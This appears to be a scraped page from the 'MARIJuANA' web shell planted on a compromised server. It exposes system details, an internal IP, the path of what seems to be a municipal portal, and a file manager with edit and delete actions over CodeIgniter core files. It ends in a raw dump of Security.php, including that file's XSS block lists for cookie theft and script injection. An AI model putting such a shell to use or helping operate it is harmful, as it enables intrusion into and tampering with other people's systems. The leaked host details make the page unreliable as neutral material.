MARIJuANA
— DIOS — NO — CREA — NADA — EN — VANO —
Linux instance-20230208-1745 6.8.0-1013-oracle #13~22.04.1-Ubuntu SMP Mon Sep 2 13:02:56 UTC 2024 x86_64
  SOFT : Apache/2.4.52 (Ubuntu) PHP : 8.1.2-1ubuntu2.19
/var/www/camara-mortugaba/portal/system/core/
10.0.0.135

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
compat dir drwxrwxr-x 2022-03-09 07:52 R D
Benchmark.php 3.992 KB -rw-rw-r-- 2023-04-17 17:35 R E G D
CodeIgniter.php 15.766 KB -rw-rw-r-- 2023-04-17 17:35 R E G D
Common.php 21.51 KB -rw-rw-r-- 2023-04-17 17:35 R E G D
Config.php 9.132 KB -rw-rw-r-- 2023-04-17 17:35 R E G D
Controller.php 2.966 KB -rw-rw-r-- 2023-04-17 17:35 R E G D
Exceptions.php 7.157 KB -rw-rw-r-- 2023-04-17 17:35 R E G D
Hooks.php 6.178 KB -rw-rw-r-- 2023-04-17 17:35 R E G D
Input.php 23.275 KB -rw-rw-r-- 2023-04-17 17:35 R E G D
Lang.php 5.41 KB -rw-rw-r-- 2023-04-17 17:35 R E G D
Loader.php 36.278 KB -rw-rw-r-- 2023-04-17 17:35 R E G D
Log.php 7.465 KB -rw-rw-r-- 2023-04-17 17:35 R E G D
Model.php 2.513 KB -rw-rw-r-- 2023-04-17 17:35 R E G D
Output.php 20.8 KB -rw-rw-r-- 2023-04-17 17:35 R E G D
Router.php 12.916 KB -rw-rw-r-- 2023-04-17 17:35 R E G D
Security.php 29.16 KB -rw-rw-r-- 2023-04-17 17:35 R E G D
URI.php 14.917 KB -rw-rw-r-- 2023-04-17 17:35 R E G D
Utf8.php 4.384 KB -rw-rw-r-- 2023-04-17 17:35 R E G D
index.html 0.128 KB -rw-rw-r-- 2023-04-17 17:35 R E G D
REQUEST EXIT
', '<', '>', "'", '"', '&', '$', '#', '{', '}', '[', ']', '=', ';', '?', '%20', '%22', '%3c', // < '%253c', // < '%3e', // > '%0e', // > '%28', // ( '%29', // ) '%2528', // ( '%26', // & '%24', // $ '%3f', // ? '%3b', // ; '%3d' // = ); /** * Character set * * Will be overridden by the constructor. * * @var string */ public $charset = 'UTF-8'; /** * XSS Hash * * Random Hash for protecting URLs. * * @var string */ protected $_xss_hash; /** * CSRF Hash * * Random hash for Cross Site Request Forgery protection cookie * * @var string */ protected $_csrf_hash; /** * CSRF Expire time * * Expiration time for Cross Site Request Forgery protection cookie. * Defaults to two hours (in seconds). * * @var int */ protected $_csrf_expire = 7200; /** * CSRF Token name * * Token name for Cross Site Request Forgery protection cookie. * * @var string */ protected $_csrf_token_name = 'ci_csrf_token'; /** * CSRF Cookie name * * Cookie name for Cross Site Request Forgery protection cookie. * * @var string */ protected $_csrf_cookie_name = 'ci_csrf_token'; /** * List of never allowed strings * * @var array */ protected $_never_allowed_str = array( 'document.cookie' => '[removed]', '(document).cookie' => '[removed]', 'document.write' => '[removed]', '(document).write' => '[removed]', '.parentNode' => '[removed]', '.innerHTML' => '[removed]', '-moz-binding' => '[removed]', '' => '-->', ' '<![CDATA[', '' => '<comment>', '<%' => '<%' ); /** * List of never allowed regex replacements * * @var array */ protected $_never_allowed_regex = array( 'javascript\s*:', '(\(?document\)?|\(?window\)?(\.document)?)\.(location|on\w*)', 'expression\s*(\(|&\#40;)', // CSS and IE 'vbscript\s*:', // IE, surprise! 'wscript\s*:', // IE 'jscript\s*:', // IE 'vbs\s*:', // IE 'Redirect\s+30\d', "([\"'])?data\s*:[^\\1]*?base64[^\\1]*?,[^\\1]*?\\1?" ); /** * Class constructor * * @return void */ public function __construct() { // Is CSRF protection enabled? if (config_item('csrf_protection')) { // CSRF config foreach (array('csrf_expire', 'csrf_token_name', 'csrf_cookie_name') as $key) { if (NULL !== ($val = config_item($key))) { $this->{'_'.$key} = $val; } } // Append application